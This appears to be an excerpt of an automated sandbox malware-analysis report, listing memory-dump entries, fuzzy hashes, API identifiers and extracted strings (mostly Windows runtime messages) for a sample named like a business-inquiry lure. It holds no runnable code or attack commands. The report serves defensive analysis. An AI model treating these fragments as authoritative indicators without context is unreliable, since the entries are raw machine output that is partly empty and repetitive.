                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                • Instruction ID: 44e4a5e487736c5a5d08b8420fa84c7ecd97ad5e631764169bca2287f007b4f6
                                                • Opcode Fuzzy Hash: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                • Instruction Fuzzy Hash: BE90022124545102D290715D84146164045B7E0211F59C422B4814994DC59589556721
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 98f3ab0e92296d0633ccfe9e15438807cfcb48d3e4f35ee388e0ad3d9ede1832
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                • Instruction ID: 4dcd75a0114a9e363e98229f58de91b5e4940aee305de7cc455471a05d5895b9
                                                • Opcode Fuzzy Hash: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                • Instruction Fuzzy Hash: 0051E7B5A00227BFDF11DF9C989097EFBF8BB48244B54852AF565DB641D334DE408BA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                • Instruction ID: 4286f0acb5ac12195842e91bb92dd85f17f3ef9f8fa77b357edcebb5960e44c5
                                                • Opcode Fuzzy Hash: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                • Instruction Fuzzy Hash: 7751E471A00646AECB24DE5DC8D09BFBBF8FB44200F14885AE596DF681E678FA40C770
                                                Strings
                                                • Execute=1, xrefs: 01574713
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015746FC
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01574742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01574787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01574725
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01574655
                                                • ExecuteOptions, xrefs: 015746A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                • Instruction ID: 381019c120061ed26f93a778e1706de2afe14c3886f87e087baeb4ecfe1797c8
                                                • Opcode Fuzzy Hash: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                • Instruction Fuzzy Hash: 2C5159B1A4021A7BEF11AAA8EC99FAD77A8FF9C300F14009DD605AF190D7709A41CF50
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015702BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015702E7
                                                • RTL: Re-Waiting, xrefs: 0157031E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01577294
                                                • RTL: Resource at %p, xrefs: 015772A3
                                                • RTL: Re-Waiting, xrefs: 015772C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280